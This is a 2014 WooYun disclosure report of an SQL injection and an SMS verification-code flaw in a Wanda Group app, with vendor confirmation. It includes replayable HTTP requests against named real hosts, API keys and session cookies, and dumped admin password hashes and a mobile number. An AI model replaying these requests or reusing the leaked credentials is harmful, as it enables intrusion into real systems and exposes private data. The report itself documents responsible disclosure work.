当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089514

漏洞标题:APP终结者12#万达集团某app云端存在sql注入+缺陷01

相关厂商:大连万达集团股份有限公司

漏洞作者: zzR

提交时间:2014-12-31 16:06

修复时间:2015-02-14 16:08

公开时间:2015-02-14 16:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-31: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-14: 细节向公众公开

简要描述:

1·据说核心需要打卡
2·万达的兄弟还记得电影票的事吗?
3·今天是2014最后一天,如果万达能送几张电影票,将从回复楼中挑选最终漏洞所得rank倍值赠送2张电影票
4·此漏洞大概20150101发,谢谢管理员!

详细说明:

app名称:万达笑脸墙
1·sql注入

GET /app/api/reviewlist?imageid=62475&t=1420007215.577105 HTTP/1.1
Host: smile.wanda.cn
User-Agent: FaceWall/1.0 CFNetwork/711.1.16 Darwin/14.0.0
Accept-Language: zh-cn
Accept: */*
api_key: efcb88285b5eca212614bf4bb0a61e52
version: 1.0
Connection: keep-alive
Proxy-Connection: keep-alive
user_name: ruantong
clientid: ios
hashcode: 97ae6ebb3232fa5bd87e4a6ed24a665d
Accept-Encoding: gzip


gw1.png


gw2.png


看库的名称,是集团官网的数据库
捞到两个admin
Database: gw_misc_db
Table: admin
[1 entry]
+---------+-------+----------------+------------+----------------------------------+------
-------+-----------+
| adminId | role | realName | dateline | password | cellP
hone | adminName |
+---------+-------+----------------+------------+----------------------------------+------
-------+-----------+
| 1 | admin | \\u963f\\u82b1 | 1344605184 | a7ac188f74ab36d1e52ab003738bb028 | 13810
678720 | admin |
+---------+-------+----------------+------------+----------------------------------+------
-------+-----------+
Database: gw_misc_db
Table: smile_admin
[1 entry]
+----+----------------------------------+------+-------+---------+------------+
| id | pw | pre | name | group | last_time |
+----+----------------------------------+------+-------+---------+------------+
| 1 | 48de2244c698282ab7caf8c1403d47d4 | JSBv | admin | 1 | 1419822004 |
+----+----------------------------------+------+-------+---------+------------+
未进一步尝试

漏洞证明:

2·缺陷:某接口支持明文短信轰炸,并且回显短信验证码,导致任意手机账号注册、登陆
注册时候
发送手机短信验证码 的请求 ,其中对手机号进行了加密
GET /wandasmile/smile/getmesssage.do?&phonenum=tAsS9ceWlLt7pxzh%252BdZ8K3ioi9okWtpqYVR5b2QCrvw4m7sqoJ5JOUJsP5f7T4xR%252F8wHL823hL7rY6E0v7xwJbuUrDeZRosKOPAfcjmkrv3YPkJNO9V5hZpb8Q3cVLUgYoFoNFjdTNgJJhLO%252F3BFnA9uIuI8eiKNAY5OtQGmv8A%253D HTTP/1.1
Host: app.wanda.cn
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: JSESSIONID=6B3E76F52B769C06836548C7F4BD269E
Connection: keep-alive
Accept-Language: zh-cn
User-Agent: FaceWall/1.0 CFNetwork/711.1.16 Darwin/14.0.0
在后面的测试中,发现了在不加密状态下,同样可以发送验证码,并且验证码回显

duanxin.png


修复方案:

1·输入过滤
2·控制相关接口权限

版权声明:转载请注明来源 zzR@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-31 18:10

厂商回复:

感谢zzR同学的关注与贡献!此漏洞目测存在,马上通知业务整改!

最新状态:

暂无